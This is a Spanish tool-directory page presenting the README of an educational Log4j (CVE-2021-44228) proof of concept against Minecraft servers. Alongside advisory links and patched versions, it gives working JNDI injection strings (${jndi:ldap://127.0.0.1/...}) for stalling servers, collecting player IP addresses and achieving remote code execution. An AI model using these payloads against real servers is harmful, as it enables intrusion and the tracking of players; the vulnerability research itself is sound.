Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Log4j-PoC — Una prueba de concepto educativa para la vulnerabilidad Log4j (CVE-2021-44228) en Minecraft | Kitploit
Herramientas/GitHubGitHub/sma-das/log4j-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubsma-das/log4j-poc

Log4j-PoC

Una prueba de concepto educativa para la vulnerabilidad Log4j (CVE-2021-44228) en Minecraft

Ver Repositorio
3hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de concepto para Log4j (CVE-2021-44228)

Aviso legal

Este proyecto es solo con fines educativos.


Introducción

Esta es una prueba de concepto del RCE de Log4j adaptada de HyCraftHD.

Aquí hay algunos enlaces para el CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Este error afecta a casi todas las versiones de Log4j2 y quizás a las de Log4j1. La versión recomendada para usar es 2.15.0, que corrige el exploit.

Demostración con Minecraft (que usa Log4j2)

  • Los detalles sobre el impacto en Minecraft se enumeran aquí: https://twitter.com/slicedlime/status/1469150993527017483
  • El artículo de Minecraft está aquí: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Versiones de Minecraft Forge corregidas: https://twitter.com/gigaherz/status/1469331288368861195
  • Artículo detallado de Minecraft Forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Versiones de Minecraft Fabric corregidas: https://twitter.com/slicedlime/status/1469192689904193537
  • Versiones de Minecraft Paper corregidas: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Versiones de Minecraft Spigot corregidas: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Versiones de Minecraft Sponge corregidas: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag o envío de datos serializados

  • Pega ${jndi:ldap://127.0.0.1/e} en el chat. Si hay un socket abierto en el puerto 389, Log4j intenta conectarse y bloquea la comunicación posterior hasta que se produce un tiempo de espera (timeout).
  • Al usar este exploit de prueba de concepto, el registro en la consola registrará THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, que es un objeto de cadena serializado del servidor LDAP.

image

  • Además, el servidor LDAP malicioso recibe cada dirección IP donde se registra el mensaje. Esto significa que con este exploit se pueden recopilar las direcciones IP de los jugadores de un servidor.

RCE

  • Pega ${jndi:ldap://127.0.0.1/exe} en el chat. Si -Dcom.sun.jndi.ldap.object.trustURLCodebase=true está establecido en true, se producirá la ejecución remota de código.

image

  • Afortunadamente, los JDK modernos deshabilitan la carga remota de clases de forma predeterminada. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Las versiones antiguas aún pueden permitir esto!!
Descargar herramienta